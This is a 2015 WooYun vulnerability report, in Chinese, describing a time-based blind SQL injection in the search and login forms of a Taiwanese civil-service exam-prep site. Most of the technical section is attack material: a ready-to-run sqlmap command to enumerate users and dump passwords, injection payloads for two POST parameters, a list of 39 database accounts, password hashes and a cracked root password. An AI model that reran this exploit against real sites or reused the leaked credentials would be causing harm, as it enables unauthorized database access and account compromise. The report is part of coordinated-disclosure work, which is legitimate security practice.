当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154190

漏洞标题:考友社某處存在POST型SQL植入漏洞(DBA權限+數十位系統管理員密碼泄露)(臺灣地區)

相关厂商:考友社

漏洞作者: 路人甲

提交时间:2015-11-26 00:03

修复时间:2016-01-12 03:32

公开时间:2016-01-12 03:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-28: 厂商已经确认,细节仅向厂商公开
2015-12-08: 细节向核心白帽子及相关领域专家公开
2015-12-18: 细节向普通白帽子公开
2015-12-28: 细节向实习白帽子公开
2016-01-12: 细节向公众公开

简要描述:

民國七十年成立之初,鑑於失業問題嚴重,提供公職就業服務成為我們創社的宗旨與目標。但是當時公職考試資訊並不開放,在「經濟不景 氣,公職最神氣!」口號的引領下,許多考友進入了公職領域,經由我們提供的考試資訊,公職考試不若以往令人陌生,迄今,公職考試仍為許多就業考試中的一項主流。
  在這個階段,「公職考試」是我們的服務事項,「面授輔導」是我們的服務方式。

详细说明:

地址:http://**.**.**.**/search_index.php

python sqlmap.py -u "http://**.**.**.**/search_index.php" --technique=T --form --random-agent --batch --current-user --is-dba --users --passwords

漏洞证明:

---
Parameter: postname (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: postname=THvv' AND (SELECT * FROM (SELECT(SLEEP(5)))RfJe) AND 'hVqU'='hVqU
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
current user: 'lin23765@localhost'
current user is DBA: True
database management system users [39]:
[*] 'adobereader'@'localhost'
[*] 'cactiuser'@'localhost'
[*] 'cherry'@'localhost'
[*] 'cutebox'@'localhost'
[*] 'db43a'@'%'
[*] 'dz-yuyn'@'localhost'
[*] 'dz5'@'localhost'
[*] 'goldcordyceps'@'localhost'
[*] 'ifunsun'@'localhost'
[*] 'jgn03k12'@'localhost'
[*] 'jian'@'localhost'
[*] 'jian'@'web1'
[*] 'lamerc123'@'localhost'
[*] 'lamerclinic'@'localhost'
[*] 'lin23765'@'%'
[*] 'lin23765'@'**.**.**.**'
[*] 'lin23765'@'localhost'
[*] 'lohasers'@'localhost'
[*] 'mchogs'@'localhost'
[*] 'mytest'@'%'
[*] 'mytest'@'localhost'
[*] 'new-mytest'@'%'
[*] 'newdz'@'localhost'
[*] 'photo'@'localhost'
[*] 'phpbb3'@'localhost'
[*] 'phplistdb'@'%'
[*] 'plastic-life'@'localhost'
[*] 'realplayer'@'localhost'
[*] 'rfchen'@'localhost'
[*] 'root'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 's8anye98u'@'localhost'
[*] 'sfs3addman'@'localhost'
[*] 'sfs3man'@'localhost'
[*] 'tccsj_admin'@'localhost'
[*] 'urpet'@'localhost'
[*] 'wiki'@'localhost'
[*] 'wikii'@'%'


---
Parameter: userid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: userid=aQww' AND (SELECT * FROM (SELECT(SLEEP(5)))wTjJ) AND 'pjnA'='pjnA&userpw=
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
database management system users password hashes:
[*] adobereader [1]:
password hash: 74f2a98e5905be38
[*] cherry [1]:
password hash: 41eca5b8304aa5d6
[*] dz5 [1]:
password hash: \x03\x05
[*] ifunsun [1]:
password hash: 670026d9413739d4
[*] lamerclinic [1]:
password hash: \t\t\t!
[*] lohasers [1]:
password hash: 53bdc13709eb3550
[*] new-mytest [1]:
password hash: NULL
[*] root [2]:
password hash: 38d145490622ba92
password hash: 565491d704013245
clear-text password: 12345 6
[*] s8anye98u [2]:
password hash: NULL
password hash: \x06
[*] wiki [1]:
password hash: !

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-28 03:31

厂商回复:

感謝通報

最新状态:

2016-01-07:HITCON 於接獲通報後多次 email 該網站所示之服務信箱,至今尚無回應。


漏洞评价:

评价